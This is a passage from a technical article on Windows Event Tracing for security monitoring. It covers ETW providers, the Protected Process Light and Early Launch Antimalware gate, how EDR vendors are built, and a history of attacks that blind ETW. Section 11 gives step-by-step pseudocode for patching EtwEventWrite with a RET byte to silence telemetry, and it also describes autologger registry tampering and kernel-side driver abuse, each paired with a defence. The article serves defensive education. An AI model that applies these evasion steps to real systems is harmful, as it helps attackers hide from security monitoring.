A COM interface exposed by Windows since 2015 that script engines and runtime hosts can call into to submit content for malware scanning. The Microsoft Learn AMSI portal lists PowerShell, JScript and VBScript via Windows Script Host, Office VBA macros, and User Account Control as in-box integrators [@ms-amsi-portal]; the .NET CLR's assembly load path joined the list with .NET Framework 4.8, as documented in Adam Chester's CLR walk-through [@xpn-hiding-dotnet]. The scanned content is the post-deobfuscation form -- the actual code about to execute, not the obfuscated wrapper. Scan results surface via the `Microsoft-Antimalware-Scan-Interface` ETW provider.

The AMSI Operational event log channel typically appears empty by default. The Palantir taxonomy [@palantir-tampering-wayback] [@palantir-tampering-wayback] notes the keyword bitmask configured for the channel does not surface scan-result events. The events fire on the ETW bus and can be consumed in real time, but they do not land in the user-visible evtx log unless the consumer reconfigures the keyword mask.

`Microsoft-Windows-PowerShell`

GUID {a0c1853b-5c40-4b15-8766-3cf1c58f985a}. Event ID 4104 is the script-block-logging event that records each PowerShell script block before execution; event ID 4103 records pipeline execution detail; event ID 4100 records errors. The Microsoft Learn about_Logging_Windows reference (Windows PowerShell 5.1) [@ms-powershell-logging] [@ms-powershell-logging] documents EID 4104 verbatim ("EventId 4104 / 0x1008 ... Channel Operational ... Task CommandStart") and the script-block-logging configuration. PowerShell Core 7+ uses a separate ETW provider (PowerShellCore, GUID {f90714a8-5509-434a-bf6d-b1624c8a19a2}). Combined with AMSI the two providers give an EDR the executed PowerShell content twice: once at AMSI submission, once at script-block logging. Detection engineers use both as cross-checks.

`Microsoft-Windows-DotNETRuntime`

GUID {e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}, verbatim in Adam Chester's PoC source [@xpn-hiding-dotnet] [@xpn-hiding-dotnet]. The .NET CLR provider. Surfaces assembly load events, JIT compilation, AppDomain creation, exception throws. Critical for detecting Cobalt Strike's execute-assembly style of in-memory .NET payload loading. This is the provider that goes dark in the section 1 hook scene after the operator's EtwEventWrite patch.This is the provider Adam Chester targeted in the canonical March 17, 2020 ETW patching post [@xpn-hiding-dotnet]. The Cobalt Strike execute-assembly workflow produces a loud signal here -- "assembly X loaded into PID Y from in-memory source Z" -- so silencing it locally was a valuable evasion. The story comes back in section 11.

`Microsoft-Windows-Sysmon`

GUID {5770385F-C22A-43E0-BF4C-06F5698FFBD9}, surfaced by wevtutil gp Microsoft-Windows-Sysmon and inventoried in [@gh-jdu2600]; the Microsoft Learn Sysmon page by Russinovich and Garnier [@ms-sysmon] [@ms-sysmon] documents authorship, the protected-process status, and the Microsoft-Windows-Sysmon/Operational channel. This is the publishing side of Sysmon. Sysmon's kernel driver SysmonDrv.sys collects events through PsSetCreateProcessNotifyRoutineEx and friends; the user-mode service then republishes via this ETW provider so any consumer (a SIEM forwarder, a SOC dashboard, a custom analytic) can subscribe without writing its own kernel driver. Events also land in the Microsoft-Windows-Sysmon/Operational evtx channel.

`Microsoft-Windows-Threat-Intelligence` (EtwTi)

GUID {f4e1897c-bb5d-5668-f1d8-040f4d8dd344}, verbatim in the fluxsec.red walkthrough [@fluxsec-eti] [@fluxsec-eti]. The only ETW source in the catalogue that fires from inside the kernel for memory-modifying syscalls. Ten task IDs, all prefixed KERNEL_THREATINT_TASK_:

ALLOCVM (NtAllocateVirtualMemory -- local and cross-process)
PROTECTVM (NtProtectVirtualMemory)
MAPVIEW (section mapping; cross-process and self)
QUEUEUSERAPC (NtQueueApcThread cross-process)
SETTHREADCONTEXT (NtSetContextThread cross-process)
READVM (NtReadVirtualMemory -- local and cross-process)
WRITEVM (NtWriteVirtualMemory -- local and cross-process)
SUSPENDRESUME_THREAD
SUSPENDRESUME_PROCESS
DRIVER_DEVICE

Each task pairs with a 64-bit keyword bitmask that distinguishes LOCAL vs REMOTE (cross-process) and KERNEL_CALLER vs not. The Elastic Security Labs walkthrough [@elastic-doubling-down] [@elastic-doubling-down] lists the named Win32/Nt syscalls that surface here:

"The most notable addition to this visibility is the Microsoft-Windows-Threat-Intelligence Event Tracing for Windows (ETW) provider ... VirtualAlloc, VirtualProtect, MapViewOfFile, VirtualAllocEx, VirtualProtectEx, MapViewOfFile2, QueueUserAPC, SetThreadContext, WriteProcessMemory, ReadProcessMemory(lsass)" -- Elastic Security Labs [@elastic-doubling-down] [@elastic-doubling-down]

The kernel-emitted ETW provider for memory-modifying syscalls. GUID `{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}`. Events are emitted from the kernel side of the syscall path (not from a user-mode trampoline), which makes the provider unreachable from a user-mode patcher in the calling process. Consumption is gated behind Protected Process Light at the Antimalware signer level, paired with an Early Launch Antimalware driver. The provider first shipped in the Windows 10 RS-era; the precise build is not stated verbatim in any Microsoft primary located, with community references converging on no later than 1709.

The first-ship-build is hedged: the provider GUID and task inventory are well-documented in third-party reverse-engineering primaries, but no Microsoft primary located in the source verification stage pins the exact build. The community reference range is Windows 10 1607 (RS1) through 1709 (RS3). The dispositive practical evidence is Yarden Shafir's 2023 Trail of Bits walkthrough [@trailofbits-shafir] [@trailofbits-shafir], which shows live-debugger output of CSFalconService.exe (CrowdStrike) holding EtwConsumer handles to multiple logger IDs simultaneously. By 2023 third-party EDRs were demonstrably consuming EtwTi at scale.

The catalogue as a single screen

Provider name	GUID	Surface	Gate	Primary source
Microsoft-Windows-Security-Auditing	`{54849625-5478-4994-A5BA-3E3B0328C30D}`	Audit-policy events (4624/4625/4688/...)	None (Local Security Policy)	[@ms-event-4624]
Microsoft-Windows-Kernel-Process	`{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}`	Process / thread / image-load events	None (admin)	[@fireeye-silketw-launch], [@gh-jdu2600]
Microsoft-Windows-Kernel-File	(manifest archive)	File I/O syscalls	None (admin)	[@gh-jdu2600], [@gh-repnz]
Microsoft-Windows-Kernel-Network	(manifest archive)	TCP/UDP send/receive	None (admin)	[@gh-jdu2600], [@gh-repnz]
Microsoft-Windows-Kernel-Registry	(manifest archive)	Registry create/open/set/delete	None (admin)	[@gh-jdu2600], [@gh-repnz]
Microsoft-Antimalware-Scan-Interface	`{2A576B87-09A7-520E-C21A-4942F0271D67}`	Post-deobfuscation script content	None (admin)	[@ms-amsi-portal], [@palantir-tampering-wayback]
Microsoft-Windows-PowerShell	`{a0c1853b-5c40-4b15-8766-3cf1c58f985a}`	Script-block logging (4104), pipeline	None (admin)	[@gh-jdu2600]
Microsoft-Windows-DotNETRuntime	`{e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}`	CLR assembly load, JIT, exceptions	None (admin)	[@xpn-hiding-dotnet]
Microsoft-Windows-Sysmon	`{5770385F-C22A-43E0-BF4C-06F5698FFBD9}`	Sysmon driver re-publication	None (admin)	[@gh-jdu2600], [@ms-sysmon]
Microsoft-Windows-Threat-Intelligence	`{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}`	Memory-modifying syscalls (kernel-emitted)	PPL + ELAM (Antimalware signer level)	[@fluxsec-eti], [@elastic-doubling-down]

This is the *security* catalogue. The full Windows manifest-based provider list is roughly 1,300 entries on a current Windows 11 build; performance-tuning, diagnostic, and developer-facing providers fill out the rest. The jdu2600 inventory [@gh-jdu2600] [@gh-jdu2600] tracks the full list across Win10 versions; the repnz archive [@gh-repnz] [@gh-repnz] preserves byte-stable manifest copies for cross-version diffing.

Nine of the ten rows in that table are accessible to any SYSTEM-privileged user-mode service. The tenth -- EtwTi -- requires a passport. The next section is about who issues the passport.

9. The PPL / ELAM gate: why EtwTi is not for everyone

To consume the one ETW provider that fires from the kernel for memory-modifying syscalls, your service must be (a) a Protected Process Light [@paragmali-com-app-ide], (b) signed at the Antimalware signer level with EKU 1.3.6.1.4.1.311.61.4.1, and (c) loaded from disk by an Early Launch Antimalware [@paragmali-com-to-userini] driver registered at boot. Two of those three were not possible for third parties until the Windows 10 RS-era.

fluxsec.red [@fluxsec-eti] [@fluxsec-eti] gives the prerequisite list verbatim:

"In order to start receiving ETW:TI signals, we need: 1. A service running as Protected Process Light, 2. An Early Launch Antimalware driver and certificate, 3. A logging mechanism." -- [@fluxsec-eti]

Each prerequisite has a story.

Protected Process Light at the Antimalware signer level

Windows 8.1 introduced the protected service concept specifically for antimalware engines. The motivation was simple: a malicious process running as administrator should not be able to inject code into the antimalware service or attach a debugger to it. The Microsoft Learn primary [@ms-protect-am] [@ms-protect-am] sets out the model:

"Windows 8.1 introduced a new concept of protected services to protect anti-malware services... In addition to the existing ELAM driver certification requirements, the driver must have an embedded resource section containing the information of the certificates used to sign the user mode service binaries." -- [@ms-protect-am]

PPL is a process-protection level. A given process has a level on the PPL lattice; another process can open it for write or debug only if the requesting process's level is greater than or equal to the target's. Antimalware-PPL is a signer level on that lattice. The kernel admits a process to Antimalware-PPL when its image is signed with a certificate whose EKU includes 1.3.6.1.4.1.311.61.4.1 (Windows Antimalware) and whose certificate is enrolled in an ELAM driver's allow-list at boot.

A Windows process-protection model. Each process has a PPL level; another process may open it for write or debug only if the requestor is at an equal or higher level. Originally introduced for DRM, the lattice was extended in Windows 8.1 to host the Antimalware signer level for protecting antimalware services from administrative-rights attackers. A specific signer level on the PPL lattice. Reserved in Windows 8.1 for Microsoft Defender; opened to third-party EDR vendors via ELAM onboarding in the Windows 10 RS-era. Consumption of the `Microsoft-Windows-Threat-Intelligence` ETW provider is gated at the Antimalware signer level: an `EnableTraceEx2` call from a non-Antimalware-PPL caller against the EtwTi GUID returns `ERROR_ACCESS_DENIED` (the `EnableTraceEx2` [@ms-enabletraceex2] [@ms-enabletraceex2] page documents the error code for callers that lack the documented administrative groups; the per-provider PPL-signer-level check that triggers it for the EtwTi GUID specifically is described in the [@fluxsec-eti] prerequisite list).

Early Launch Antimalware

ELAM is a driver class that loads before any other non-Microsoft boot driver. The Microsoft Learn primary [@ms-elam] [@ms-elam] describes it:

"Because an ELAM service runs as a PPL (Protected Process Light), you need to debug using a kernel debugger... AM drivers are initialized first and allowed to control the initialization of subsequent boot drivers, potentially not initializing unknown boot drivers." -- [@ms-elam]

The boot sequence runs like this. Winload loads the ELAM driver as part of the early-boot path. The ELAM driver registers a callback via IoRegisterBootDriverCallback and gets to inspect each subsequent boot driver, returning a verdict (initialize / do not initialize / unknown) based on the certificate inventory it carries in its embedded resource section. The kernel honours that verdict. After boot drivers settle, the SCM launches the paired user-mode antimalware service with the LaunchProtected = SERVICE_LAUNCH_PROTECTED_ANTIMALWARE_LIGHT flag, and the kernel admits that service to Antimalware-PPL because its signing certificate matches an entry in the ELAM driver's allow-list.

A driver class that loads before any non-Microsoft boot driver. The ELAM driver registers a boot-driver callback to inspect subsequent drivers and an embedded-resource certificate inventory of permitted user-mode antimalware service signatures. Together with PPL, ELAM gates which user-mode antimalware services can pass the Antimalware-PPL admission check.

The 1709 onboarding

Microsoft Defender's MsMpEng.exe ran at the Antimalware signer level by default starting around the Windows 10 1709 timeframe (October 17, 2017), and the same release is widely cited in EDR-vendor documentation as the moment the Antimalware-PPL onboarding was extended to third-party EDR vendors. The Microsoft primary that pins the 1709 third-party onboarding date is not in the public ETW documentation; we treat the date as widely-cited rather than verified.

The dispositive practical evidence is the Trail of Bits 2023 walkthrough by Yarden Shafir [@trailofbits-shafir] [@trailofbits-shafir]. Shafir's WinDbg JS scripts walk the live _ETW_REALTIME_CONSUMER data structures of a running Windows host and print:

"Process CSFalconService.exe with ID 0x1e54 has handle 0x760 to Logger ID 3" -- [@trailofbits-shafir]

That is CrowdStrike's user-mode service, holding a real-time consumer handle to an EtwTi logger session. By 2023 the third-party Antimalware-PPL story is operationally complete.

sequenceDiagram participant BL as Winload (boot) participant EL as ELAM Driver participant SCM as Service Control Manager participant SVC as EDR Service participant K as Kernel ETW BL->>EL: Load ELAM driver (early boot) EL->>EL: Register IoRegisterBootDriverCallback then read embedded cert inventory Note over EL: ELAM gates subsequent boot drivers SCM->>SVC: Start EDR service with PROTECTED_ANTIMALWARE_LIGHT flag K->>SVC: Verify signature against ELAM allow-list K-->>SVC: Admit to Antimalware-PPL SVC->>K: EnableTraceEx2(session, EtwTi GUID, ...) K->>K: Check caller signer level ge Antimalware K-->>SVC: SUCCESS Note over SVC,K: Non-PPL caller would receive ERROR_ACCESS_DENIED here

Why this gate matters for the section 1 hook

The asymmetry that defines the entire generation is one sentence in the fluxsec.red walkthrough [@fluxsec-eti] [@fluxsec-eti]:

We cannot patch out the Threat Intelligence provider as this is emitted from within the kernel itself. To do so, you'd require kernelmode execution and then to patch out those signals so no ETW signals are emitted. -- [@fluxsec-eti]

That is the answer to the puzzle the section 1 hook posed. The Adam Chester 2020 patch operates on a user-mode trampoline in the calling process. ntdll!EtwEventWrite is a stub that calls down through NtTraceEvent into the kernel; rewriting its first byte to 0xC3 short-circuits the user-mode entry path and the calling process emits no events through that stub. But EtwTi does not fire from the user-mode entry path. EtwTi fires from inside the kernel implementation of NtAllocateVirtualMemory and friends, after the syscall has crossed the boundary, on a path the user-mode patcher cannot reach without first achieving kernel execution.

Key idea: EtwTi is the only ETW provider in the catalogue whose producer fires from the kernel side of the syscall path -- and that is exactly why a user-mode patch in the calling process cannot silence it. The PPL+ELAM gate that controls consumer admission is paired with a producer location that no in-process attacker can reach.

The 2017 PPL+ELAM gate was a deliberate structural defense against the patch class that was only fully publicised three years later. By the time Chester wrote his March 2020 post, the load-bearing security signal was already structurally out of reach of his technique.

The combination of PPL and ELAM is not an arbitrary defense-in-depth stack. PPL gates *consumer identity* at signer level: only a binary signed with the Antimalware EKU and enrolled in an ELAM allow-list can subscribe. ELAM gates *load order*: the gate is set during early boot, before any code an attacker could load gets a chance to interfere. The signer-level check is hard because forging the signature requires breaking Microsoft's PKI; the load-order check is hard because subverting it requires compromising the boot path, which Secure Boot and the Vulnerable Driver Blocklist exist to defend.

That is the gate. Now we walk the consumers that pass through it.

10. Six vendors, three spectra: a map of the EDR consumer architecture

Defender, CrowdStrike, SentinelOne, Sysmon, Wazuh, Elastic Defend. They look interchangeable on a vendor comparison sheet. They are not, and the differences are entirely about which substrates each one consumes.

There are three axes that distinguish them.

Axis 1: kernel callbacks vs ETW

Some EDRs consume process-creation events through ETW (subscribing to Microsoft-Windows-Kernel-Process from a SYSTEM-privileged user-mode service). Others register kernel callbacks directly through PsSetCreateProcessNotifyRoutineEx [@ms-pssetprocnotify] [@ms-pssetprocnotify] and PsSetCreateThreadNotifyRoutine [@ms-pssetthreadnotify] [@ms-pssetthreadnotify] from a kernel driver they ship.

The trade-off is sharp. Kernel callbacks are synchronous: the kernel calls into the driver before the operation completes, the driver runs at PASSIVE_LEVEL in the originating thread context with normal kernel APCs disabled, and the driver can deny the operation by writing a non-success status to CreationStatus. ETW is asynchronous: the event is emitted from the producer's hot path, drained from a per-CPU buffer by the writer thread, and delivered to the consumer's callback at some later point. ETW cannot deny anything; it can only observe.

The `PsSetCreate*NotifyRoutine` family of kernel APIs. A driver calls `PsSetCreateProcessNotifyRoutineEx` (process create/exit), `PsSetCreateThreadNotifyRoutine` (thread create/exit), or `PsSetLoadImageNotifyRoutine` (image load) at boot to register a callback. The kernel invokes the callback synchronously, in the originating thread context at PASSIVE_LEVEL with normal kernel APCs disabled. The `Ex` variant of the process callback receives a `CreationStatus` field the driver can write to deny the operation.

CrowdStrike, SentinelOne, Sysmon, and Elastic Defend ship kernel drivers and use callbacks for the latency-critical hot path. Defender uses both -- callbacks from WdFilter.sys and ETW consumption from MsMpEng.exe -- because as the in-box engine it has the institutional position to do so. Wazuh ships no kernel driver; it consumes ETW exclusively via SilkETW-class wrappers, which makes it less invasive but unable to deny.

Axis 2: PPL adoption

Defender (MsMpEng.exe and MsMpEngCP.exe) runs at Antimalware-PPL by default. CrowdStrike's CSFalconService.exe runs at Antimalware-PPL, demonstrably [@trailofbits-shafir] [@trailofbits-shafir]. SentinelOne's SentinelAgent.exe is widely reported to run at Antimalware-PPL via vendor documentation, although it does not appear in the Trail of Bits sample debugger output. Sysmon runs as a protected process but not at the Antimalware signer level [@ms-sysmon] [@ms-sysmon] -- the Microsoft Learn page states "The service runs as a protected process, thus disallowing a wide range of user mode interactions" without naming Antimalware specifically.

Wazuh and Elastic Defend's user-mode services run as standard SYSTEM-privileged services without PPL.

Axis 3: EtwTi consumption

This axis is determined by axis 2. Defender consumes EtwTi by design -- it is the in-box reason EtwTi exists. CrowdStrike and SentinelOne consume EtwTi (the Trail of Bits debugger output is the practical demonstration). Sysmon does not consume EtwTi: it is not Antimalware-PPL, so its EnableTraceEx2 calls against the EtwTi GUID would receive ERROR_ACCESS_DENIED. Sysmon relies on its own SysmonDrv.sys callbacks for the in-memory threat surface that EtwTi covers for the others. Wazuh and Elastic Defend do not consume EtwTi for the same reason; Elastic Defend ships its own kernel driver to compensate [@elastic-doubling-down] [@elastic-doubling-down], using Microsoft-blessed kernel-callback paths for memory events.

Vendor	Process surface	PPL level	EtwTi?	Primary source
Microsoft Defender	Driver callbacks (`WdFilter.sys`) + ETW (`MsMpEng.exe`)	Antimalware-PPL	Yes	[@ms-protect-am]
CrowdStrike Falcon	Driver callbacks + ETW	Antimalware-PPL	Yes ([@trailofbits-shafir] live evidence)	[@trailofbits-shafir]
SentinelOne	Driver callbacks + ETW	Antimalware-PPL	Widely reported	-- (vendor docs; SentinelAgent.exe not in [@trailofbits-shafir] sample)
Sysmon	`SysmonDrv.sys` callbacks; publishes via own ETW provider	Protected (not Antimalware)	No	[@ms-sysmon]
Wazuh	ETW only (SilkETW-class)	Standard SYSTEM	No	--
Elastic Defend	Own kernel driver + ETW	Standard SYSTEM	No	[@elastic-doubling-down]

Sysmon is worth singling out as the canonical callback-then-publish reference architecture. Its kernel driver registers PsSetCreate*NotifyRoutine callbacks; its user-mode service consumes the events the driver delivers; and the service then publishes them via its own Microsoft-Windows-Sysmon ETW provider for any downstream consumer (a SIEM forwarder, a SOC dashboard, a custom analytic) to read. The result is that Sysmon's events are universally consumable -- which is why Wazuh and Splunk both ship Sysmon configurations as their default kernel-event source.

Sysmon's design choice is the reference architecture for the callback-then-publish pattern, even though Sysmon is not itself an Antimalware-PPL EDR. By publishing through its own ETW provider rather than writing to a private channel, Sysmon makes its events consumable by any downstream pipeline. Wazuh and the Splunk Universal Forwarder can both ingest Sysmon events without any custom integration work. This is why Sysmon, despite being free, is the de facto kernel-event source for the open-source SIEM world. flowchart LR K[Kernel callbacks
synchronous, can deny] --- L1[Sysmon driver] K --- L2[CrowdStrike driver] K --- L3[SentinelOne driver] K --- L4[Elastic driver] K --- L5[Defender WdFilter.sys] M[ETW providers
asynchronous, observe-only
up to 8 consumers per provider] --- M1[Defender MsMpEng] M --- M2[CrowdStrike service] M --- M3[SentinelOne service] M --- M4[Sysmon service] M --- M5[Wazuh ETW reader] M --- M6[Elastic Defend service] K -.latency-vs-coupling axis.-> M

The CrowdStrike July 2024 channel-file outage was a kernel-driver brittleness story, not an ETW story. The Falcon kernel driver's content-update parser dereferenced an out-of-bounds pointer when processing a channel file whose Rapid Response Content template had 21 input fields while the sensor's Content Interpreter expected only 20, triggering an out-of-bounds array read, BSOD-ing roughly 8.5 million Windows hosts [@ms-crowdstrike-2024][@crowdstrike-rca-2024]. That story belongs to the App Identity in Windows article [@paragmali-com-app-ide] in this series; it is mentioned here only to mark that the cost of the synchronous-kernel-driver path is a higher blast radius when the driver itself is buggy.

A note on Defender's cloud schema. The events that surface in Microsoft Defender for Endpoint's hunting tables -- DeviceProcessEvents, DeviceFileEvents, DeviceNetworkEvents, DeviceImageLoadEvents, DeviceRegistryEvents -- are the cloud-side abstraction over the kernel and ETW telemetry the Defender sensor collects locally. The full schema mapping from ETW provider to cloud column is out of scope here, but the substrate is the same.

Six vendors, three axes, one substrate. Now we walk the attack tradition that the substrate has to survive.

11. The attack tradition: five generations of trying to blind ETW

Every generation of ETW has been attacked. Some attacks broke a single provider; some broke every user-mode provider on a host; one would, if it worked at scale, break Defender. The defense story is on the same five-generation timeline.

Gen 1 (2014-2018): autologger registry tampering

The dispositive taxonomy is Matt Graeber and Lee Christensen's December 24, 2018 Palantir CIRT post [@palantir-tampering-wayback] [@palantir-tampering-wayback], preserved in the Wayback Machine because the direct Medium URL has since returned HTTP 403 to non-browser fetchers. The opening framing is verbatim:

"Event Tracing for Windows (ETW) is the mechanism Windows uses to trace and log system events. Attackers often clear event logs to cover their tracks. Though the act of clearing an event log itself generates an event, attackers who know ETW well may take advantage of tampering opportunities to cease the flow of logging temporarily or even permanently, without generating any event log entries in the process." -- [@palantir-tampering-wayback]

Graeber and Christensen split the technique into two classes. Persistent tampering writes to the autologger registry path described in section 6, disabling a session before it ever starts at next boot; the events of interest are never captured because the session is never running. Ephemeral tampering targets a live session: stopping the session via ControlTrace, removing a provider from a session via EnableTraceEx2(EVENT_CONTROL_CODE_DISABLE_PROVIDER, ...), or directly clearing the session's buffers.

The defense is direct: monitor the autologger registry surface. Sysmon Event ID 13 [@ms-sysmon] surfaces registry value-set events in HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\; a SOC playbook that alerts on any unexpected write to that subtree catches the persistent class of attack reliably. Matt Graeber's authorship is cross-confirmed by the palantir/exploitguard repository [@gh-palantir-exploitguard] [@gh-palantir-exploitguard], which credits him as the lead researcher on the ETW work.

Gen 2 (2020): user-mode `EtwEventWrite` 0xC3 RET patch

The technique that made ETW patching a household tradecraft term is Adam Chester's "Hiding your .NET - ETW", March 17, 2020 [@xpn-hiding-dotnet] [@xpn-hiding-dotnet]. The mechanic is one byte:

Locate ntdll!EtwEventWrite (or in modern variants ntdll!NtTraceEvent) in the calling process's memory.
Use VirtualProtect to make the page writable.
Write the byte 0xC3 over the function's first byte.
Restore the page protection.

0xC3 is the near-return opcode [@felixcloutier-ret] [@felixcloutier-ret]: "C3 RET ZO Valid Valid Near return to calling procedure." Any caller into the function falls straight back to its return address before producing a single event. The calling process now silently fails to emit any user-mode ETW events for any provider that funnels through the patched stub -- including Microsoft-Windows-DotNETRuntime.

The technique has been re-implemented in every language that can call VirtualProtect. The fluxsec.red Rust port [@fluxsec-etw-patching] [@fluxsec-etw-patching] explains the modern variant verbatim:

"When a ETW Provider sends a notification, it will eventually reach into ntdll.dll for the function NtTraceEvent... we can simply patch the function address to return straight from byte 0. The opcode for a ret is C3, so we can swap out the opcode 4C with C3 to immediately return out of the stub." -- [@fluxsec-etw-patching]

Here is the structure of the patch in TypeScript pseudocode -- not actually runnable Win32, but mirroring exactly what a Windows binary would do:

{` // Pseudocode: silence user-mode ETW for the calling process. // This silences only the calling process and only user-mode providers // that funnel through the patched stub.

// 1. Resolve the address of ntdll!EtwEventWrite in this process. const ntdll = getModuleHandle("ntdll.dll"); const fn = getProcAddress(ntdll, "EtwEventWrite");

// 2. Make the function's first page writable. const PAGE_EXECUTE_READWRITE = 0x40; let oldProtect = 0; virtualProtect(fn, 1, PAGE_EXECUTE_READWRITE, /* out */ ref(oldProtect));

// 3. Write 0xC3 (RET) over the first byte. Caller now returns immediately. writeByte(fn, 0xC3);

// 4. Restore original page protection. virtualProtect(fn, 1, oldProtect, /* out */ ref(oldProtect));

// Limits: // - Silences only this process. // - Silences only providers whose emit path funnels through this stub. // - Cannot silence kernel-emitted providers like Microsoft-Windows-Threat-Intelligence. `}

Note: The patch operates on the calling process's user-mode trampoline. Other processes on the host are unaffected; their ETW emissions continue normally. Kernel-emitted providers like Microsoft-Windows-Threat-Intelligence are unaffected even in the patched process; they fire from the kernel side of the syscall path, after control has crossed the user/kernel boundary, on a code path the user-mode patcher cannot reach without first achieving kernel execution.

Gen 3 (2021-2023): kernel-mode primitives

If a user-mode patch cannot reach EtwTi, can a kernel-mode patch? Yes -- but the attacker first needs kernel execution. The most common path is BYOVD [@paragmali-com-in-windows]: load a signed but vulnerable driver and use its primitive to read or write kernel memory. Once you can write kernel memory you can target ETW's internal data structures directly.

Binarly's Black Hat Europe 2021 talk [@binarly-edr] [@binarly-edr] documents the surface verbatim:

Many ways to disable ETW logging are publicly available from passing a TRUE boolean parameter into a `nt!EtwpStopTrace` function to finding an ETW specific structure and dynamically modifying it or patching `ntdll!ETWEventWrite` or `advapi32!EventWrite` to return immediately thus stopping the user-mode loggers. -- [@binarly-edr]

The kernel-side primitives Binarly enumerates target the _ETW_GUID_ENTRY structure for a provider, the EtwpRegistration linked list of registered providers, and the EtwpEventTracingProhibited flag the kernel checks before emitting events. Yarden Shafir's 2023 Trail of Bits walkthrough [@trailofbits-shafir] [@trailofbits-shafir] provides the contemporary kernel-side data structure walk through _ETW_REALTIME_CONSUMER and _ETW_SILODRIVERSTATE, and notes:

"Most recently, the Lazarus Group bypassed EDR detection by disabling ETW providers" -- [@trailofbits-shafir]

The architectural-level treatment is well-documented; the specific kernel offsets that change between Windows builds are a moving target. We treat the technique class as well-established and the per-build offset details as out of scope.

Defense Gen 1 (2017): Antimalware-PPL + ELAM gate on EtwTi

Section 9 covered this in detail. The point to record here, in the attack-tradition timeline, is that the Antimalware-PPL gate predates the Adam Chester 2020 user-mode patch by three years. Microsoft did not respond to Chester's post; they had already put the load-bearing security signal structurally out of reach of any user-mode patch in the calling process. The user-mode patch class is generic against Microsoft-Windows-DotNETRuntime and the rest of the user-mode catalogue; it is structurally impotent against Microsoft-Windows-Threat-Intelligence.

Defense Gen 2 (2022): Vulnerable Driver Blocklist on by default

The kernel-mode primitive class needs a kernel write. Without a vulnerability in the EDR's kernel driver, the realistic path is BYOVD: load a third-party signed driver that exposes a memory-write primitive. The structural defense is Microsoft's Vulnerable Driver Blocklist [@ms-vdb] [@ms-vdb]:

Since the Windows 11 2022 update, the vulnerable driver blocklist is enabled by default for all devices, and can be turned on or off via the Windows Security app... the vulnerable driver blocklist is also enforced when either memory integrity, also known as hypervisor-protected code integrity (HVCI), Smart App Control, or S mode is active... The blocklist is updated quarterly. In addition, blocklist updates are delivered through the monthly Windows updates as part of the standard servicing process. -- [@ms-vdb]

The blocklist enumerates known-vulnerable signed drivers by hash; the kernel refuses to load anything on the list. On a Windows 11 22H2-or-later host with the default settings, the BYOVD primitive against most known-vulnerable drivers is closed. With HVCI on, the closure is enforced even against attackers who would otherwise try to load drivers via legacy paths. The empirical bound is the LOLDrivers project's catalogue of known-vulnerable drivers; the blocklist tracks public discovery with a lag of approximately one quarter, which is the residual window an attacker can exploit before a freshly disclosed driver is added.

The attack pattern of loading a known-vulnerable but signed driver to obtain a kernel-mode primitive (memory read, memory write, or arbitrary code execution). Used in real-world EDR-blinding attacks, including by the Lazarus Group as cited in Trail of Bits' 2023 ETW walk [@trailofbits-shafir]. The Microsoft-maintained blocklist of known-vulnerable signed drivers, by hash. Enabled by default on Windows 11 22H2 and later. Enforced more strictly when HVCI, Smart App Control, or S mode is active. Updated quarterly per the Microsoft Learn primary [@ms-vdb].

The LOLDrivers project [@loldrivers] [@loldrivers] is the empirical anchor for the BYOVD lag story. It catalogues known-vulnerable signed drivers as a community resource; the Microsoft blocklist updates quarterly, but blocklist updates are also delivered through monthly Windows servicing, so a freshly-disclosed driver can live in an exploitation window of as short as ~1 month (via Patch Tuesday) or up to a full quarter before its hash is added.

flowchart LR subgraph Attacks A1["Gen 1 2014-2018: Autologger registry tampering -- Palantir CIRT taxonomy"] A2["Gen 2 2020: EtwEventWrite 0xC3 RET -- Adam Chester"] A3["Gen 3 2021-2023: Kernel _ETW_GUID_ENTRY -- EtwpRegistration EtwpStopTrace via BYOVD"] end subgraph Defenses D1["Sysmon Event ID 13 -- monitor Autologger subtree"] D2["Antimalware-PPL plus ELAM -- gate on EtwTi 2017"] D3["Vulnerable Driver Blocklist -- default-on Win11 22H2 plus HVCI"] end A1 --> D1 A2 --> D2 A3 --> D3

The 2026 picture

User-mode patching cannot reach the kernel-mode provider that EDR cares about. The BYOVD primitive that could reach it is structurally narrowed by default on supported hardware. The remaining gap is the long tail of newly-disclosed vulnerable drivers between disclosure and blocklist update, plus any custom kernel zero-day an attacker discovers in an EDR's own driver. Both are real, both are exploited in the wild, neither is the universally-applicable evasion the 2020-era user-mode patch class was.

That is the operational story. But ETW has structural limits even when no attacker is patching anything.

12. Theoretical limits: what ETW cannot see, even with every defence engaged

Even on a perfectly-configured Windows 11 box -- HVCI [@paragmali-com-in-windows] on, Vulnerable Driver Blocklist on, Antimalware-PPL Defender consuming EtwTi, third-party EDR ELAM-onboarded -- there are events ETW does not emit. Some are observed too late. Some are not observed at all.

There are three structural ceilings.

Pre-ETW kernel paths

The Global Logger session is one of the earliest things to come up at boot, but it is not the first. Some early-init driver paths run before any ETW session exists; they cannot be traced via ETW. Measured Boot is the discipline that records this prefix into TPM PCRs, with attestation handled by the platform integrity layer rather than by ETW. The implication for EDR is that any malicious code executing during early boot, before the Global Logger session is up, is invisible to ETW.

Incomplete EtwTi syscall coverage

The 10 KERNEL_THREATINT_TASK_* task IDs are the public surface. The underlying syscall set the kernel actually instruments is not exhaustively documented. The fluxsec.red inventory [@fluxsec-eti] [@fluxsec-eti] is the public surface, not the private one. Some syscalls are clearly covered (NtAllocateVirtualMemory for cross-process allocation surfaces as KERNEL_THREATINT_TASK_ALLOCVM); some have partial coverage (MAPVIEW_LOCAL and MAPVIEW_REMOTE keywords cover some but not all of the section-mapping primitive set across NtCreateSection, NtMapViewOfSection, NtMapViewOfSectionEx, image-section vs file-section variants); some are not enumerated at all in the public manifest. Process-hollowing primitives that combine NtUnmapViewOfSection and NtMapViewOfSection may be partially covered depending on which path the attacker takes.

The async-flush gap

ETW's per-CPU ring buffer is asynchronous. If a process allocates RWX memory, writes shellcode, executes it, and returns within one writer-thread flush interval, the event is recorded but the attacker's payload has already executed. The synchronous denial primitive on Windows belongs to kernel notify routines, not to ETW. The Microsoft Learn primary on About Event Tracing [@ms-about-etw] [@ms-about-etw] is explicit that events can be lost:

